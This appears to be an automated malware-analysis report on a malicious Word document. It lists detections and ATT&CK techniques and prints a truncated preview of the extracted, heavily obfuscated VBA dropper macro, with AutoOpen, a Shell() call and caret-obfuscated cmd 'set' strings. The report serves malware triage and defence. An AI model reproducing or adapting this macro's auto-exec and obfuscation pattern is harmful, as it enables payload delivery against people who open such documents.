MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the execution of a shell command, which is highly indicative of a downloader or droppper functionality. The macro's obfuscated nature and the presence of a Shell() call suggest it is designed to fetch and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6578629-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6578629-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18076 bytes |
SHA-256: 52db9b90e6da99066eeaf358fcefd3a9b9c1be4077cfc3f5fed9a4e0b47e6584 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DbTAiYloZzmu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ahbFTYD()
On Error Resume Next
For OfTswp = opKsRw To 30475
FtBZI = (nUjms - ChrW(14360 * 33928) * YiIMf * CInt(TChCP + Sqr(74898)) + 83975 - 21322 / 87641 - CDate(iFPoVl - 59426 + 86375 - Hex(oaKmFE / 65412)) + (jRcjE * Tan(JlDMz)))
Next
For VNcbF = mrdmm To 6580
brfIP = (zhbKtQ - ChrW(83984 * 57294) * FCRZfi * CInt(azjhB + Sqr(34748)) + 81069 - 65832 / 89476 - CDate(ZTdZid - 76159 + 70904 - Hex(cuCjK / 26641)) + (zmbUNY * Tan(LQhYia)))
Next
ahbFTYD = HalhShlkRbR + Shell(pMEhBRbK + Chr(qdiEFPZI + vbKeyC + iiOGmPsm) + hzAivtXzN + jzcwnhuAWr + lzHrhH + KsCUYtnW + lrdbbXw + lOJuuwmYWFj + tuGuLUkZ, PluSm + 0 + IbNdtEBw)
For rtQOrY = PbZio To 56253
VYOZT = (UEHaSB - ChrW(73351 * 35006) * wEFKW * CInt(BmUSpa + Sqr(65612)) + 20563 - 3784 / 81002 - CDate(ubpsS - 97729 + 29064 - Hex(Lnlqwq / 73479)) + (GiUZdG * Tan(UmuHd)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mtFjt = KcQiG To 80719
LwPwY = (DsbjhQ - ChrW(89882 * 77052) * VFYrl * CInt(YtjGCk + Sqr(52627)) + 11117 - 80549 / 220 - CDate(jSvVE - 80782 + 41681 - Hex(aIKNXT / 97753)) + (DGKFO * Tan(NmFiq)))
Next
ahbFTYD
For rbmlj = hcslR To 30468
LKqNj = (nDSXz - ChrW(59577 * 89381) * iFJQVz * CInt(owWZj + Sqr(7523)) + 72234 - 42891 / 49136 - CDate(pvCCu - 44276 + 47592 - Hex(ZCRYE / 75158)) + (lUCXj * Tan(vPCWL)))
Next
End Sub
Attribute VB_Name = "ozFBhtFKjr"
Function hzAivtXzN()
On Error Resume Next
For JpQNAs = RTJBj To 401
diwHL = (nzaAKE - ChrW(21509 * 66084) * wRXvN * CInt(Rkkbb + Sqr(19304)) + 46571 - 4732 / 35718 - CDate(ikWjC - 27178 + 71431 - Hex(lpJPP / 6094)) + (joQWsi * Tan(moMwOf)))
Next
qMskQX = "md WtdSC" + "ibhsch TstcAoCJ" + "wNFwEShPQi o" + "fiwf" + "Aq"
For pPzHzj = owwij To 10837
YCBUh = (uVHfaY - ChrW(86340 * 96193) * XEzFjv * CInt(MHSWb + Sqr(84935)) + 80889 - 33536 / 77778 - CDate(YaOmK - 56251 + 63690 - Hex(qTHRhZ / 75879)) + (Hbuib * Tan(OwpuC)))
Next
pLUBbJ = "jcHC & " + " %^c^o^m^" + "S^p^E^c^%" + " " + " %" + "^c^" + "o^m^S^p^E^c" + "^% /V " + " " + " /c s"
For ECfqr = zSjuM To 51911
FqcRv = (sjFlPW - ChrW(10731 * 70171) * LPzQa * CInt(unoRa + Sqr(34842)) + 50045 - 40318 / 73945 - CDate(OTQVh - 74129 + 63661 - Hex(TKbzRQ / 37821)) + (izGTzw * Tan(vLDoA)))
Next
iJGpTjjYXcC = "et %NLzHM" + "JoWj" + "FiCZj" + "Y%=wLtRcu" + "HTn"
For ISOTY = CpPSZ To 66666
zQvvW = (zpnaO - ChrW(35969 * 27994) * TUKiw * CInt(ZKrMjs + Sqr(29713)) + 32207 - 92693 / 29519 - CDate(hluzkA - 31024 + 62796 - Hex(CfVrA / 748)) + (jjUEn * Tan(BdmYiO)))
Next
oCwNWuwd = "J&&set %h" + "uHojGaa" + "AJGAPS" + "%=p&&set %om" + "AzmVbC" + "aQJXvN%" + "=o" + "^w&&s" + "et %wzA"
For IhsYuj = TSjTuz To 65757
upzMfi = (hbKsHj - ChrW(34021 * 23698) * RBCHV * CInt(wzUSqQ + Sqr(1143)) + 2140 - 20690 / 80473 - CDate(WizZWi - 91748 + 54251 - Hex(RNBYw / 4033)) + (XBsva * Tan(HsBsN)))
Next
HpNuSNql = "wV" + "hSuzuzwGYb%=wU" + "KdIQ" + "GfrViqaT&&set " + "%QCbZHpB" + "B%=" + "!%huHojGa" + "aAJGAPS%!" + "&&set %Ed"
For PjazDO = jOmvS To 13417
VUiwvU = (KczSuS - ChrW(25308 * 51285) * XdVDM * CInt(rOzJl + Sqr(36643)) + 83282 - 72441 / 11724 - CDate(ouonJF - 94423 + 85779 - Hex(EDahI / 93823)) + (IKORwD * Tan(BdUwl)))
Next
BBtJDsAXQRj = "UCNqWkjzk" + "fjdV" + "%=EVpiwmJ&&" + "set" + " %fHhbhMOZj" + "wKvTN%=e^r" + "&&set %"
hzAivtXzN = qMskQX + pLUBbJ + iJGpTjjYXcC + oCwNWuwd + HpNuSNql + BBtJDsAXQRj
End Function
Function jzcwnhuAWr()
On Error Resume Next
For VTrtrG = YnuSj To 55810
IPQjp = (mKhWo - ChrW(56151 * 71632) * nJpGLJ * CInt(lMhpCZ + Sqr(51781)) + 40136 - 29111 / 93608 - CDate(TCKlMo - 17893 + 46188 - Hex(KmUEOU / 92119)) + (dFLUTS * Tan(Diqno)))
Next
iFOMGhq = "BqG" + "VBqOzbUhB%=!%o" + "mAzmVb" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.